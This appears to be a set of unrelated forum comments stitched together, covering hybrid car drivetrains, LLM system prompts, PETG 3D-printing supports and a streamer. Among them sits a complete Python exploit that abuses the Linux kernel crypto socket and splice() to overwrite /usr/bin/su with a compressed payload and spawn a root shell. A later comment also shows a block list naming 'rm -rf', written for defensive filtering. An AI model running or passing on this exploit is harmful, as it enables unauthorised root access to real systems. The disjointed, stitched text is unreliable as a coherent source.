what's the drivetrain? is it a series or parallel hybrid?
Edit: looks like it's got a 6-speed dsg. not a series hybrid then.
i don't understand why the series hybrids are dying out. on paper it's a better system. changing nothing else, my 2012 ampera would get like 250km range with today's battery tech and yet the top-trim phev's are barely scratching 100km.
#!/usr/bin/env python3
import os
from ctypes import c_int32 as i32, c_char as char
import zlib
import socket as s


def inject(file, offset, data):
    # connect to the kernel crypto subsystem's AEAD endpoint
    sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET)
    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    # set cipher key and tag size, then wait for the system to be ready
    sock.setsockopt(s.SOL_ALG, s.ALG_SET_KEY, (char * 68)(8, 0, 1, 0, 0, 0, 0, 16))
    sock.setsockopt(s.SOL_ALG, s.ALG_SET_AEAD_AUTHSIZE, None, 4)
    conn, _ = sock.accept()
    # pass in configuration
    conn.sendmsg(
        [b"AAAA" + data],  # pad to tag size
        [
            (s.SOL_ALG, s.ALG_SET_OP, i32(s.ALG_OP_DECRYPT)),  # set operation
            (s.SOL_ALG, s.ALG_SET_IV, (char * 20)(16)),  # set init vector
            (s.SOL_ALG, s.ALG_SET_AEAD_ASSOCLEN, i32(8)),  # set associated data length
        ],
        s.MSG_MORE,
    )
    # move the file through a pipe to the connection without copying
    r, w = os.pipe()
    os.splice(file, w, offset + 4, offset_src=0)
    os.splice(r, conn.fileno(), offset + 4)
    try:
        conn.recv(8 + offset)
    except OSError:
        pass


binary = os.open("/usr/bin/su", os.O_RDONLY)
offset = 0
payload = zlib.decompress(
    bytes.fromhex(
        "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
        "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
        "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
    )
)
while offset < len(payload):
    inject(binary, offset, payload[offset : offset + 4])
    offset += 4
os.system("su")
as far as i understand the writeup, the weakness is in the splice() call, because it silently crosses an auth boundary. the payload is the zlib blob that gets decompressed in the snippet above.
configuration is things like temperature, output cutoff, and tool use. those are out-of-band. the system prompt, being in-band, cannot be configuration. it's like calling an http request configuration for the response.
of course. but the larger the context grows, the less it affects the output. there are some ways around this, like moving the system prompt to the end of the context before every answer, but the very existence of the system prompt is a hack to begin with. what's really needed for a chatbot to be safe is a functional rules-based pre- and post-filtering system. personally i think the chatbot "style" has played out its role and is living on as a gimmick. actual tooling built with language models is stuff like LSP servers and accessibility software, and that needs rigid configuration.
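to sketch what i mean by out-of-band filtering: the rules are ordinary code sitting entirely outside the context window, so the model can't be talked out of them the way a system prompt can. all names and rules here are made up for illustration:

```python
# hypothetical rules-based wrappers around a model call
def pre_filter(user_input: str) -> str:
    # hard input rules, enforced before anything reaches the model
    if len(user_input) > 4000:
        raise ValueError("input too long")
    return user_input

def post_filter(model_output: str) -> str:
    # hard output rules, enforced after generation
    banned = ("rm -rf", "DROP TABLE")
    if any(b in model_output for b in banned):
        return "[blocked by output rule]"
    return model_output

print(post_filter("sure, here's the recipe"))
print(post_filter("just run rm -rf / to fix it"))  # gets blocked
```

the point isn't these particular rules, it's that they're deterministic and live outside the token stream, unlike anything you put in the prompt.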
because the system prompt is not configuration, it's input. it has the same priority as whatever the user types in, and it takes up valuable space in the context window.
to add onto what pennomi is saying, this also shows that openai doesn't understand language models. the only actual functionality the llm has is still "given the previous text, what is the most likely character/phoneme/token?", so rather than (to use an analogy) changing the font in their word document, they add a sentence in the middle of the document that says "everything from here is in comic sans".
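the "most likely next token" framing is easy to see in miniature. a toy bigram model does literally the same job, just at a vastly smaller scale (corpus is made up, obviously):

```python
from collections import Counter, defaultdict

# count which word follows which in a tiny corpus
corpus = "the cat sat on the mat the cat ate".split()
follows = defaultdict(Counter)
for prev, nxt in zip(corpus, corpus[1:]):
    follows[prev][nxt] += 1

def predict(word):
    # "given the previous text, what is the most likely token?"
    return follows[word].most_common(1)[0][0]

print(predict("the"))  # "cat" — seen twice after "the", vs "mat" once
```

everything in the input, system prompt included, is just conditioning text for that one operation.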
but it's not surprising that they'd do this. if we've learned anything from the earlier claude frontend leak, where their "sentiment analysis" tool for input text turned out to be a regex (you literally have a language model! that's the one thing it's actually good at!), it's pretty clear that most of the big players in the llm space have gotten high on their own supply and can't be expected to reason about the operations the system is actually performing.
kinda, yeah. i halved the print speeds and lowered the fan to 40%, which makes petg come out beautifully, provided the support material cooperates. support interface ironing is crucial, as is lowering the interface z distance to basically as low as it will go. if the support interface area is less than about 5mm², it's basically a coin toss whether it sticks or not. the extruder can even drag small parts loose on retraction if your temps are too low. it took finding a detail hanging off the wiping brush for me to figure that one out.
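for reference, these are roughly the knobs i'm talking about, written ini-style. treat the key names as approximate, slicers rename these between versions, so check what your profile actually calls them:

```ini
; approximate setting names, not copied from any one slicer version
support_interface_pattern = ironed   ; iron the support interface
support_top_z_distance    = 0.05     ; interface z distance, as low as it goes
fan_speed                 = 40       ; part cooling at 40%
; print speeds: halve whatever your profile defaults are
```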
also, if you're experimenting and still getting spaghetti, one thing to look out for is a current bug in some of orca's tree support generation. whenever the slicer generates a big combined tree, check the preview carefully, because chances are the supports start in mid-air, 10-20 layers above the plate. there is a setting called "base pattern" that's supposed to work around it, but i haven't gotten it to work.
oh i've never watched anything directly by him except his animal well playthrough, where he spends a lot of time "thinking" by looking down at his desk